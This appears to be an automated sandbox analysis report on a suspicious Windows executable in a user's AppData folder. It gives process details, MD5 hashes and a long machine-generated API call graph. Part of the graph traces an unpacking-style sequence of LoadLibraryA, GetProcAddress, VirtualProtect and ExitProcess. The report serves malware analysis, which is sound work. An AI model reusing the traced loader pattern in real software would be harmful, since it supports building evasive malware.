                                    Start time:02:22:30
                                    Start date:26/11/2024
                                    Path:C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe"
                                    Imagebase:0x660000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:02:22:30
                                    Start date:26/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:02:22:38
                                    Start date:26/11/2024
                                    Path:C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe"
                                    Imagebase:0x230000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:02:22:38
                                    Start date:26/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                      Execution Graph

                                      Execution Coverage:3.9%
                                      Dynamic/Decrypted Code Coverage:0.4%
                                      Signature Coverage:6.1%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:54
API calls 94398->94399 94400 94ddd7 GetVersionExW 94399->94400 94401 936a63 48 API calls 94400->94401 94402 94de1a 94401->94402 94427 94dfb4 94402->94427 94407 9a24c8 94409 94dea4 GetCurrentProcess 94444 94df5f LoadLibraryA GetProcAddress 94409->94444 94410 94df31 GetSystemInfo 94415 94df0e 94410->94415 94411 94dee3 94438 94e00c 94411->94438 94414 94debb 94414->94410 94414->94411 94418 94df21 94415->94418 94419 94df1c FreeLibrary 94415->94419 94418->94390 94419->94418 94420 94df29 GetSystemInfo 94422 94df03 94420->94422 94421 94def9 94441 94dff4 94421->94441 94422->94415 94425 94df09 FreeLibrary 94422->94425 94425->94415 94426->94396 94428 94dfbd 94427->94428 94429 93b18b 48 API calls 94428->94429 94430 94de22 94429->94430 94431 936571 94430->94431 94432 93657f 94431->94432 94433 93b18b 48 API calls 94432->94433 94434 93658f 94433->94434 94434->94407 94435 94df77 94434->94435 94445 94df89 94435->94445 94449 94e01e 94438->94449 94442 94e00c 2 API calls 94441->94442 94443 94df01 GetNativeSystemInfo 94442->94443 94443->94422 94444->94414 94446 94dea0 94445->94446 94447 94df92 LoadLibraryA 94445->94447 94446->94409 94446->94414 94447->94446 94448 94dfa3 GetProcAddress 94447->94448 94448->94446 94450 94def1 94449->94450 94451 94e027 LoadLibraryA 94449->94451 94450->94420 94450->94421 94451->94450 94452 94e038 GetProcAddress 94451->94452 94452->94450 94453 9a8eb8 94457 97a635 94453->94457 94455 9a8ec3 94456 97a635 84 API calls 94455->94456 94456->94455 94458 97a66f 94457->94458 94462 97a642 94457->94462 94458->94455 94459 97a671 94489 94ec4e 81 API calls 94459->94489 94461 97a676 94468 93936c 94461->94468 94462->94458 94462->94459 94462->94461 94466 97a669 94462->94466 94464 97a67d 94465 93510d 48 API calls 94464->94465 94465->94458 94488 944525 61 API calls _memcpy_s 94466->94488 94469 939380 94468->94469 94470 939384 94468->94470 94469->94464 94471 9a4cbd __i64tow 94470->94471 94472 9a4bbf 94470->94472 94473 939398 94470->94473 94479 9393b0 __itow Mailbox _wcscpy 
94470->94479 94474 9a4bc8 94472->94474 94475 9a4ca5 94472->94475 94490 95172b 80 API calls 4 library calls 94473->94490 94474->94479 94481 9a4be7 94474->94481 94497 95172b 80 API calls 4 library calls 94475->94497 94478 94f4ea 48 API calls 94480 9393ba 94478->94480 94479->94478 94480->94469 94491 93ce19 94480->94491 94482 94f4ea 48 API calls 94481->94482 94484 9a4c04 94482->94484 94485 94f4ea 48 API calls 94484->94485 94486 9a4c2a 94485->94486 94486->94469 94487 93ce19 48 API calls 94486->94487 94487->94469 94488->94458 94489->94461 94490->94479 94492 93ce28 __NMSG_WRITE 94491->94492 94493 94ee75 48 API calls 94492->94493 94494 93ce50 _memcpy_s 94493->94494 94495 94f4ea 48 API calls 94494->94495 94496 93ce66 94495->94496 94496->94469 94497->94479 94498 18b9838 94512 18b7488 94498->94512 94500 18b9904 94515 18b9728 94500->94515 94518 18ba928 GetPEB 94512->94518 94514 18b7b13 94514->94500 94516 18b9731 Sleep 94515->94516 94517 18b973f 94516->94517 94519 18ba952 94518->94519 94519->94514 94520 a55f70 94521 a55f80 94520->94521 94522 a5609a LoadLibraryA 94521->94522 94527 a560df VirtualProtect VirtualProtect 94521->94527 94523 a560b1 94522->94523 94523->94521 94526 a560c3 GetProcAddress 94523->94526 94525 a56144 94525->94525 94526->94523 94528 a560d9 ExitProcess 94526->94528 94527->94525 94529 9a9bec 94565 940ae0 _memcpy_s Mailbox 94529->94565 94531 941526 Mailbox 94694 97cc5c 86 API calls 4 library calls 94531->94694 94534 94146e 94544 936eed 48 API calls 94534->94544 94537 940509 94697 97cc5c 86 API calls 4 library calls 94537->94697 94538 94f4ea 48 API calls 94557 93fec8 94538->94557 94540 941473 94696 97cc5c 86 API calls 4 library calls 94540->94696 94541 9aa246 94548 936eed 48 API calls 94541->94548 94542 9aa922 94559 93ffe1 Mailbox 94544->94559 94547 936eed 48 API calls 94547->94557 94548->94559 94549 93d7f7 48 API calls 94549->94557 94550 9697ed InterlockedDecrement 94550->94557 94551 9aa873 94552 9aa30e 94552->94559 94692 9697ed InterlockedDecrement 94552->94692 
94553 93ce19 48 API calls 94553->94565 94554 950f0a 52 API calls __cinit 94554->94557 94556 9aa973 94698 97cc5c 86 API calls 4 library calls 94556->94698 94557->94534 94557->94537 94557->94538 94557->94540 94557->94541 94557->94547 94557->94549 94557->94550 94557->94552 94557->94554 94557->94556 94557->94559 94561 9415b5 94557->94561 94689 941820 331 API calls 2 library calls 94557->94689 94690 941d10 59 API calls Mailbox 94557->94690 94560 9aa982 94695 97cc5c 86 API calls 4 library calls 94561->94695 94563 94f4ea 48 API calls 94563->94565 94565->94531 94565->94553 94565->94557 94565->94559 94565->94563 94566 9aa706 94565->94566 94568 9697ed InterlockedDecrement 94565->94568 94572 93fe30 94565->94572 94601 990d09 94565->94601 94604 97b55b 94565->94604 94608 990d1d 94565->94608 94611 98f0ac 94565->94611 94643 97a6ef 94565->94643 94649 98e822 94565->94649 94691 98ef61 82 API calls 2 library calls 94565->94691 94693 97cc5c 86 API calls 4 library calls 94566->94693 94568->94565 94573 93fe50 94572->94573 94585 93fe7e 94572->94585 94574 94f4ea 48 API calls 94573->94574 94574->94585 94575 94146e 94576 936eed 48 API calls 94575->94576 94583 93ffe1 94576->94583 94577 9697ed InterlockedDecrement 94577->94585 94578 93d7f7 48 API calls 94578->94585 94579 940509 94704 97cc5c 86 API calls 4 library calls 94579->94704 94582 941473 94703 97cc5c 86 API calls 4 library calls 94582->94703 94583->94565 94584 936eed 48 API calls 94584->94585 94585->94575 94585->94577 94585->94578 94585->94579 94585->94582 94585->94583 94585->94584 94587 94f4ea 48 API calls 94585->94587 94588 9aa246 94585->94588 94594 950f0a 52 API calls __cinit 94585->94594 94595 9aa30e 94585->94595 94597 9aa973 94585->94597 94600 9415b5 94585->94600 94699 941820 331 API calls 2 library calls 94585->94699 94700 941d10 59 API calls Mailbox 94585->94700 94587->94585 94590 936eed 48 API calls 94588->94590 94589 9aa922 94589->94565 94590->94583 94593 9aa873 94593->94565 94594->94585 94595->94583 94701 9697ed 
InterlockedDecrement 94595->94701 94705 97cc5c 86 API calls 4 library calls 94597->94705 94599 9aa982 94702 97cc5c 86 API calls 4 library calls 94600->94702 94706 98f8ae 94601->94706 94603 990d19 94603->94565 94605 97b564 94604->94605 94606 97b569 94604->94606 94823 97a4d5 94605->94823 94606->94565 94609 98f8ae 129 API calls 94608->94609 94610 990d2d 94609->94610 94610->94565 94612 93d7f7 48 API calls 94611->94612 94613 98f0c0 94612->94613 94614 93d7f7 48 API calls 94613->94614 94615 98f0c8 94614->94615 94616 93d7f7 48 API calls 94615->94616 94617 98f0d0 94616->94617 94618 93936c 81 API calls 94617->94618 94633 98f0de 94618->94633 94619 936a63 48 API calls 94619->94633 94620 98f2cc 94621 98f2f9 Mailbox 94620->94621 94856 936b68 48 API calls 94620->94856 94621->94565 94623 98f2b3 94624 93518c 48 API calls 94623->94624 94626 98f2c0 94624->94626 94625 98f2ce 94628 93518c 48 API calls 94625->94628 94631 93510d 48 API calls 94626->94631 94627 93c799 48 API calls 94627->94633 94632 98f2dd 94628->94632 94629 936eed 48 API calls 94629->94633 94630 93bdfa 48 API calls 94634 98f175 CharUpperBuffW 94630->94634 94631->94620 94635 93510d 48 API calls 94632->94635 94633->94619 94633->94620 94633->94621 94633->94623 94633->94625 94633->94627 94633->94629 94633->94630 94636 93bdfa 48 API calls 94633->94636 94640 93936c 81 API calls 94633->94640 94641 93518c 48 API calls 94633->94641 94642 93510d 48 API calls 94633->94642 94845 93d645 94634->94845 94635->94620 94637 98f23a CharUpperBuffW 94636->94637 94855 94d922 55 API calls 2 library calls 94637->94855 94640->94633 94641->94633 94642->94633 94644 97a6fb 94643->94644 94645 94f4ea 48 API calls 94644->94645 94646 97a709 94645->94646 94647 97a717 94646->94647 94648 93d7f7 48 API calls 94646->94648 94647->94565 94648->94647 94650 98e868 94649->94650 94651 98e84e 94649->94651 94861 98ccdc 48 API calls 94650->94861 94860 97cc5c 86 API calls 4 library calls 94651->94860 94654 98e871 94655 93fe30 330 API calls 94654->94655 94656 98e8cf 
94655->94656 94657 98e96a 94656->94657 94659 98e916 94656->94659 94688 98e860 Mailbox 94656->94688 94658 98e978 94657->94658 94661 98e9c7 94657->94661 94880 97a69d 48 API calls 94658->94880 94862 979b72 48 API calls 94659->94862 94664 93936c 81 API calls 94661->94664 94661->94688 94663 98e949 94863 9445e0 94663->94863 94667 98e9e1 94664->94667 94665 98e99b 94881 93bc74 48 API calls 94665->94881 94669 93bdfa 48 API calls 94667->94669 94671 98ea05 CharUpperBuffW 94669->94671 94670 98e9a3 Mailbox 94882 943200 94670->94882 94672 98ea1f 94671->94672 94674 98ea72 94672->94674 94675 98ea26 94672->94675 94676 93936c 81 API calls 94674->94676 94908 979b72 48 API calls 94675->94908 94677 98ea7a 94676->94677 94909 931caa 49 API calls 94677->94909 94680 98ea54 94681 9445e0 330 API calls 94680->94681 94681->94688 94682 98ea84 94683 93936c 81 API calls 94682->94683 94682->94688 94684 98ea9f 94683->94684 94910 93bc74 48 API calls 94684->94910 94686 98eaaf 94687 943200 330 API calls 94686->94687 94687->94688 94688->94565 94689->94557 94690->94557 94691->94565 94692->94559 94693->94531 94694->94559 94695->94559 94696->94551 94697->94542 94698->94560 94699->94585 94700->94585 94701->94583 94702->94583 94703->94593 94704->94589 94705->94599 94707 93936c 81 API calls 94706->94707 94708 98f8ea 94707->94708 94710 98f92c Mailbox 94708->94710 94742 990567 94708->94742 94710->94603 94711 98fb8b 94712 98fcfa 94711->94712 94716 98fb95 94711->94716 94805 990688 89 API calls Mailbox 94712->94805 94715 98fd07 94715->94716 94717 98fd13 94715->94717 94755 98f70a 94716->94755 94717->94710 94718 93936c 81 API calls 94736 98f984 Mailbox 94718->94736 94723 98fbc9 94769 94ed18 94723->94769 94726 98fbfd 94776 94c050 94726->94776 94727 98fbe3 94775 97cc5c 86 API calls 4 library calls 94727->94775 94730 98fbee GetCurrentProcess TerminateProcess 94730->94726 94731 98fc14 94741 98fc3e 94731->94741 94787 941b90 94731->94787 94732 98fd65 94732->94710 94738 98fd7e FreeLibrary 94732->94738 94734 98fc2d 94803 
99040f 105 API calls _free 94734->94803 94735 941b90 48 API calls 94735->94741 94736->94710 94736->94711 94736->94718 94736->94736 94773 9929e8 48 API calls _memcpy_s 94736->94773 94774 98fda5 60 API calls 2 library calls 94736->94774 94738->94710 94741->94732 94741->94735 94804 93dcae 50 API calls Mailbox 94741->94804 94806 99040f 105 API calls _free 94741->94806 94743 93bdfa 48 API calls 94742->94743 94744 990582 CharLowerBuffW 94743->94744 94807 971f11 94744->94807 94748 93d7f7 48 API calls 94749 9905bb 94748->94749 94814 9369e9 48 API calls _memcpy_s 94749->94814 94751 9905d2 94752 93b18b 48 API calls 94751->94752 94754 9905de Mailbox 94752->94754 94753 99061a Mailbox 94753->94736 94754->94753 94815 98fda5 60 API calls 2 library calls 94754->94815 94756 98f725 94755->94756 94760 98f77a 94755->94760 94757 94f4ea 48 API calls 94756->94757 94759 98f747 94757->94759 94758 94f4ea 48 API calls 94758->94759 94759->94758 94759->94760 94761 990828 94760->94761 94762 990a53 Mailbox 94761->94762 94768 99084b _strcat _wcscpy __NMSG_WRITE 94761->94768 94762->94723 94763 93cf93 58 API calls 94763->94768 94764 93d286 48 API calls 94764->94768 94765 93936c 81 API calls 94765->94768 94766 95395c 47 API calls std::exception::_Copy_str 94766->94768 94768->94762 94768->94763 94768->94764 94768->94765 94768->94766 94818 978035 50 API calls __NMSG_WRITE 94768->94818 94770 94ed2d 94769->94770 94771 94edc5 VirtualProtect 94770->94771 94772 94ed93 94770->94772 94771->94772 94772->94726 94772->94727 94773->94736 94774->94736 94775->94730 94777 94c064 94776->94777 94779 94c069 Mailbox 94776->94779 94819 94c1af 48 API calls 94777->94819 94785 94c077 94779->94785 94820 94c15c 48 API calls 94779->94820 94781 94f4ea 48 API calls 94783 94c108 94781->94783 94782 94c152 94782->94731 94784 94f4ea 48 API calls 94783->94784 94786 94c113 94784->94786 94785->94781 94785->94782 94786->94731 94786->94786 94788 941cf6 94787->94788 94791 941ba2 94787->94791 94788->94734 94789 941bae 94794 941bb9 
94789->94794 94822 94c15c 48 API calls 94789->94822 94791->94789 94792 94f4ea 48 API calls 94791->94792 94793 9a49c4 94792->94793 94795 94f4ea 48 API calls 94793->94795 94796 941c5d 94794->94796 94797 94f4ea 48 API calls 94794->94797 94802 9a49cf 94795->94802 94796->94734 94798 941c9f 94797->94798 94799 941cb2 94798->94799 94821 932925 48 API calls 94798->94821 94799->94734 94801 94f4ea 48 API calls 94801->94802 94802->94789 94802->94801 94803->94741 94804->94741 94805->94715 94806->94741 94808 971f3b __NMSG_WRITE 94807->94808 94809 971f79 94808->94809 94810 971f6f 94808->94810 94813 971ffa 94808->94813 94809->94748 94809->94754 94810->94809 94816 94d37a 60 API calls 94810->94816 94813->94809 94817 94d37a 60 API calls 94813->94817 94814->94751 94815->94753 94816->94810 94817->94813 94818->94768 94819->94779 94820->94785 94821->94799 94822->94794 94824 97a4ec 94823->94824 94837 97a5ee 94823->94837 94825 97a5d4 Mailbox 94824->94825 94827 97a58b 94824->94827 94830 97a4fd 94824->94830 94826 94f4ea 48 API calls 94825->94826 94842 97a54c _memcpy_s Mailbox 94826->94842 94828 94f4ea 48 API calls 94827->94828 94828->94842 94829 97a51a 94831 97a555 94829->94831 94832 97a545 94829->94832 94829->94842 94830->94829 94834 94f4ea 48 API calls 94830->94834 94836 94f4ea 48 API calls 94831->94836 94835 94f4ea 48 API calls 94832->94835 94833 94f4ea 48 API calls 94833->94837 94834->94829 94835->94842 94838 97a55b 94836->94838 94837->94606 94843 979d2d 48 API calls 94838->94843 94840 97a567 94844 94e65e 50 API calls 94840->94844 94842->94833 94843->94840 94844->94842 94846 93d654 94845->94846 94853 93d67e 94845->94853 94847 93d6c2 94846->94847 94848 93d65b 94846->94848 94854 93d6ab 94847->94854 94859 94dce0 53 API calls 94847->94859 94850 93d666 94848->94850 94848->94854 94857 93d9a0 53 API calls __cinit 94850->94857 94853->94633 94854->94853 94858 94dce0 53 API calls 94854->94858 94855->94633 94856->94621 94857->94853 94858->94853 94859->94854 94860->94688 94861->94654 94862->94663 
94864 944637 94863->94864 94865 94479f 94863->94865 94866 944643 94864->94866 94867 9a6e05 94864->94867 94868 93ce19 48 API calls 94865->94868 94970 944300 331 API calls _memcpy_s 94866->94970 94870 98e822 331 API calls 94867->94870 94875 9446e4 Mailbox 94868->94875 94872 9a6e11 94870->94872 94871 944739 Mailbox 94871->94688 94872->94871 94971 97cc5c 86 API calls 4 library calls 94872->94971 94874 944659 94874->94871 94874->94872 94874->94875 94911 976524 94875->94911 94914 986ff0 94875->94914 94923 97fa0c 94875->94923 94964 934252 94875->94964 94880->94665 94881->94670 96009 93bd30 94882->96009 94884 943267 94904 943313 _memcpy_s Mailbox 94884->94904 96082 94c36b 86 API calls 94884->96082 94886 94c3c3 48 API calls 94886->94904 94889 93fe30 331 API calls 94889->94904 94890 93d645 53 API calls 94890->94904 94891 94c2d6 48 API calls 94891->94904 94898 94f4ea 48 API calls 94898->94904 94899 97cc5c 86 API calls 94899->94904 94903 936eed 48 API calls 94903->94904 94904->94886 94904->94889 94904->94890 94904->94891 94904->94898 94904->94899 94904->94903 94906 93dcae 50 API calls 94904->94906 94907 943635 Mailbox 94904->94907 96014 932b7a 94904->96014 96021 93e8d0 94904->96021 96083 93d9a0 53 API calls __cinit 94904->96083 96084 93d8c0 53 API calls 94904->96084 96085 98f320 331 API calls 94904->96085 96086 98f5ee 331 API calls 94904->96086 96087 931caa 49 API calls 94904->96087 96088 98cda2 82 API calls Mailbox 94904->96088 96089 9780e3 53 API calls 94904->96089 96090 93d764 55 API calls 94904->96090 96091 93d6e9 94904->96091 96095 97c942 50 API calls 94904->96095 94906->94904 94907->94688 94908->94680 94909->94682 94910->94686 94972 976ca9 GetFileAttributesW 94911->94972 94915 93936c 81 API calls 94914->94915 94916 98702a 94915->94916 94976 93b470 94916->94976 94918 98703a 94919 98705f 94918->94919 94920 93fe30 331 API calls 94918->94920 94922 987063 94919->94922 95004 93cdb9 48 API calls 94919->95004 94920->94919 94922->94871 94924 97fa1c __ftell_nolock 94923->94924 
94925 97fa44 94924->94925 95104 93d286 48 API calls 94924->95104 94927 93936c 81 API calls 94925->94927 94928 97fa5e 94927->94928 94929 97fb92 94928->94929 94930 97fa80 94928->94930 94931 97fb68 94928->94931 94929->94871 94932 93936c 81 API calls 94930->94932 95020 9341a9 94931->95020 94938 97fa8c _wcscpy _wcschr 94932->94938 94935 97fb8e 94935->94929 94937 93936c 81 API calls 94935->94937 94936 9341a9 136 API calls 94936->94935 94939 97fbc7 94937->94939 94943 97fab0 _wcscat _wcscpy 94938->94943 94947 97fade _wcscat 94938->94947 95044 951dfc 94939->95044 94941 93936c 81 API calls 94942 97fafc _wcscpy 94941->94942 95105 9772cb GetFileAttributesW 94942->95105 94945 93936c 81 API calls 94943->94945 94945->94947 94946 97fb1c __NMSG_WRITE 94946->94929 94949 93936c 81 API calls 94946->94949 94947->94941 94948 97fbeb _wcscat _wcscpy 94951 93936c 81 API calls 94948->94951 94950 97fb48 94949->94950 95106 9760dd 77 API calls 4 library calls 94950->95106 94953 97fc82 94951->94953 95047 97690b 94953->95047 94954 97fb5c 94954->94929 94956 97fca2 94957 976524 3 API calls 94956->94957 94958 97fcb1 94957->94958 94959 93936c 81 API calls 94958->94959 94961 97fce2 94958->94961 94960 97fccb 94959->94960 95053 97bfa4 94960->95053 94963 934252 84 API calls 94961->94963 94963->94929 94965 93425c 94964->94965 94967 934263 94964->94967 94966 9535e4 __fcloseall 83 API calls 94965->94966 94966->94967 94968 934283 FreeLibrary 94967->94968 94969 934272 94967->94969 94968->94969 94969->94871 94970->94874 94971->94871 94973 976529 94972->94973 94974 976cc4 FindFirstFileW 94972->94974 94973->94871 94974->94973 94975 976cd9 FindClose 94974->94975 94975->94973 94977 936b0f 48 API calls 94976->94977 94999 93b495 94977->94999 94978 93b69b 95007 93ba85 94978->95007 94980 93b6b5 Mailbox 94980->94918 94983 93bcce 48 API calls 94983->94999 94984 93ba85 48 API calls 94984->94999 94985 9a397b 95018 9726bc 88 API calls 4 library calls 94985->95018 94988 93b9e4 95019 9726bc 88 API calls 4 library calls 
94988->95019 94989 9a3973 94989->94980 94992 9a3989 94993 93ba85 48 API calls 94992->94993 94993->94989 94994 9a3909 94996 936b4a 48 API calls 94994->94996 94995 93bb85 48 API calls 94995->94999 94998 9a3914 94996->94998 95002 94f4ea 48 API calls 94998->95002 94999->94978 94999->94983 94999->94984 94999->94985 94999->94988 94999->94994 94999->94995 95000 93bdfa 48 API calls 94999->95000 95003 9a3939 _memcpy_s 94999->95003 95005 93c413 59 API calls 94999->95005 95006 93bc74 48 API calls 94999->95006 95015 93c6a5 49 API calls 94999->95015 95016 93c799 48 API calls _memcpy_s 94999->95016 95001 93b66c CharUpperBuffW 95000->95001 95001->94999 95002->95003 95017 9726bc 88 API calls 4 library calls 95003->95017 95004->94922 95005->94999 95006->94999 95008 93bb25 95007->95008 95011 93ba98 _memcpy_s 95007->95011 95010 94f4ea 48 API calls 95008->95010 95009 94f4ea 48 API calls 95012 93ba9f 95009->95012 95010->95011 95011->95009 95013 94f4ea 48 API calls 95012->95013 95014 93bac8 95012->95014 95013->95014 95014->94980 95015->94999 95016->94999 95017->94989 95018->94992 95019->94989 95107 934214 95020->95107 95025 9341d4 LoadLibraryExW 95117 934291 95025->95117 95026 9a4f73 95027 934252 84 API calls 95026->95027 95029 9a4f7a 95027->95029 95031 934291 3 API calls 95029->95031 95033 9a4f82 95031->95033 95143 9344ed 95033->95143 95034 9341fb 95034->95033 95035 934207 95034->95035 95037 934252 84 API calls 95035->95037 95039 93420c 95037->95039 95039->94935 95039->94936 95041 9a4fa9 95151 934950 95041->95151 95631 951e46 95044->95631 95048 976918 _wcschr __ftell_nolock 95047->95048 95049 951dfc __wsplitpath 47 API calls 95048->95049 95052 97692e _wcscat _wcscpy 95048->95052 95050 97695d 95049->95050 95051 951dfc __wsplitpath 47 API calls 95050->95051 95051->95052 95052->94956 95054 97bfb1 __ftell_nolock 95053->95054 95055 94f4ea 48 API calls 95054->95055 95056 97c00e 95055->95056 95057 9347b7 48 API calls 95056->95057 95058 97c018 95057->95058 95059 97bdb4 GetSystemTimeAsFileTime 
95058->95059 95060 97c023 95059->95060 95061 934517 83 API calls 95060->95061 95062 97c036 _wcscmp 95061->95062 95063 97c107 95062->95063 95064 97c05a 95062->95064 95065 97c56d 94 API calls 95063->95065 95687 97c56d 95064->95687 95081 97c0d3 _wcscat 95065->95081 95068 951dfc __wsplitpath 47 API calls 95073 97c088 _wcscat _wcscpy 95068->95073 95069 9344ed 64 API calls 95070 97c12c 95069->95070 95071 9344ed 64 API calls 95070->95071 95074 97c13c 95071->95074 95072 97c110 95072->94961 95076 951dfc __wsplitpath 47 API calls 95073->95076 95075 9344ed 64 API calls 95074->95075 95077 97c157 95075->95077 95076->95081 95078 9344ed 64 API calls 95077->95078 95079 97c167 95078->95079 95080 9344ed 64 API calls 95079->95080 95082 97c182 95080->95082 95081->95069 95081->95072 95083 9344ed 64 API calls 95082->95083 95084 97c192 95083->95084 95085 9344ed 64 API calls 95084->95085 95086 97c1a2 95085->95086 95087 9344ed 64 API calls 95086->95087 95088 97c1b2 95087->95088 95657 97c71a GetTempPathW GetTempFileNameW 95088->95657 95090 97c1be 95091 953499 117 API calls 95090->95091 95093 97c1cf 95091->95093 95093->95072 95095 9344ed 64 API calls 95093->95095 95103 97c289 95093->95103 95658 952aae 95093->95658 95094 97c294 95094->95072 95096 97c342 CopyFileW 95094->95096 95100 97c2b8 95094->95100 95095->95093 95097 97c32d 95096->95097 95098 97c358 95096->95098 95097->95072 95684 97c6d9 CreateFileW 95097->95684 95098->95072 95693 97b965 95100->95693 95671 9535e4 95103->95671 95104->94925 95105->94946 95106->94954 95156 934339 95107->95156 95110 934244 FreeLibrary 95111 9341bb 95110->95111 95114 953499 95111->95114 95113 93423c 95113->95110 95113->95111 95164 9534ae 95114->95164 95116 9341c8 95116->95025 95116->95026 95364 9342e4 95117->95364 95119 9342b8 95121 9342c1 FreeLibrary 95119->95121 95122 9341ec 95119->95122 95121->95122 95124 934380 95122->95124 95125 94f4ea 48 API calls 95124->95125 95126 934395 95125->95126 95372 9347b7 95126->95372 95128 9343a1 _memcpy_s 95129 9343dc 
95128->95129 95130 9344d1 95128->95130 95131 934499 95128->95131 95132 934950 57 API calls 95129->95132 95386 97c750 93 API calls 95130->95386 95375 93406b CreateStreamOnHGlobal 95131->95375 95140 9343e5 95132->95140 95135 9344ed 64 API calls 95135->95140 95136 934479 95136->95034 95138 9a4ed7 95139 934517 83 API calls 95138->95139 95141 9a4eeb 95139->95141 95140->95135 95140->95136 95140->95138 95381 934517 95140->95381 95142 9344ed 64 API calls 95141->95142 95142->95136 95144 9a4fc0 95143->95144 95145 9344ff 95143->95145 95410 95381e 95145->95410 95148 97bf5a 95608 97bdb4 95148->95608 95150 97bf70 95150->95041 95152 9a5002 95151->95152 95153 93495f 95151->95153 95613 953e65 95153->95613 95155 934967 95160 93434b 95156->95160 95159 934321 LoadLibraryA GetProcAddress 95159->95113 95161 93422f 95160->95161 95162 934354 LoadLibraryA 95160->95162 95161->95113 95161->95159 95162->95161 95163 934365 GetProcAddress 95162->95163 95163->95161 95167 9534ba _flsall 95164->95167 95165 9534cd 95212 957c0e 47 API calls __getptd_noexit 95165->95212 95167->95165 95169 9534fe 95167->95169 95168 9534d2 95213 956e10 8 API calls __Wcsftime_l 95168->95213 95183 95e4c8 95169->95183 95172 953503 95173 95350c 95172->95173 95174 953519 95172->95174 95214 957c0e 47 API calls __getptd_noexit 95173->95214 95175 953543 95174->95175 95176 953523 95174->95176 95197 95e5e0 95175->95197 95215 957c0e 47 API calls __getptd_noexit 95176->95215 95178 9534dd _flsall @_EH4_CallFilterFunc@8 95178->95116 95184 95e4d4 _flsall 95183->95184 95217 957cf4 95184->95217 95186 95e559 95253 9569d0 47 API calls std::exception::_Copy_str 95186->95253 95187 95e552 95224 95e5d7 95187->95224 95190 95e560 95190->95187 95192 95e56f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 95190->95192 95191 95e5cc _flsall 95191->95172 95192->95187 95195 95e4e2 95195->95186 95195->95187 95227 957d7c 95195->95227 95251 954e5b 48 API calls __lock 95195->95251 95252 954ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection 
_doexit 95195->95252 95206 95e600 __wopenfile 95197->95206 95198 95e61a 95272 957c0e 47 API calls __getptd_noexit 95198->95272 95199 95e7d5 95199->95198 95204 95e838 95199->95204 95201 95e61f 95273 956e10 8 API calls __Wcsftime_l 95201->95273 95203 95354e 95216 953570 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95203->95216 95269 9663c9 95204->95269 95206->95198 95206->95199 95206->95206 95274 95185b 59 API calls 3 library calls 95206->95274 95208 95e7ce 95208->95199 95275 95185b 59 API calls 3 library calls 95208->95275 95210 95e7ed 95210->95199 95276 95185b 59 API calls 3 library calls 95210->95276 95212->95168 95213->95178 95214->95178 95215->95178 95216->95178 95218 957d05 95217->95218 95219 957d18 RtlEnterCriticalSection 95217->95219 95220 957d7c __mtinitlocknum 46 API calls 95218->95220 95219->95195 95221 957d0b 95220->95221 95221->95219 95254 95115b 47 API calls 3 library calls 95221->95254 95255 957e58 RtlLeaveCriticalSection 95224->95255 95226 95e5de 95226->95191 95228 957d88 _flsall 95227->95228 95229 957d91 95228->95229 95230 957da9 95228->95230 95256 9581c2 47 API calls 2 library calls 95229->95256 95231 957da7 95230->95231 95237 957e11 _flsall 95230->95237 95231->95230 95259 9569d0 47 API calls std::exception::_Copy_str 95231->95259 95234 957d96 95257 95821f 47 API calls 5 library calls 95234->95257 95235 957dbd 95238 957dc4 95235->95238 95239 957dd3 95235->95239 95237->95195 95260 957c0e 47 API calls __getptd_noexit 95238->95260 95242 957cf4 __lock 46 API calls 95239->95242 95240 957d9d 95258 951145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95240->95258 95245 957dda 95242->95245 95244 957dc9 95244->95237 95246 957dfe 95245->95246 95247 957de9 InitializeCriticalSectionAndSpinCount 95245->95247 95261 951c9d 95246->95261 95248 957e04 95247->95248 95267 957e1a RtlLeaveCriticalSection _doexit 95248->95267 95251->95195 95252->95195 95253->95190 95255->95226 95256->95234 95257->95240 95259->95235 95260->95244 95262 951ca6 
